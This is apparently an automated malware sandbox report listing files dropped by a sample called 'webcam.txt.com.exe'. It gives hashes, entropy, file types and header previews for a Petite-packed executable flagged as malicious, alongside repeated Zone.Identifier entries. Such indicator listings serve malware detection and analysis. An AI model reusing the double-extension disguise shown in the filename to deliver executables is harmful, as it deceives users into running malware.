                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
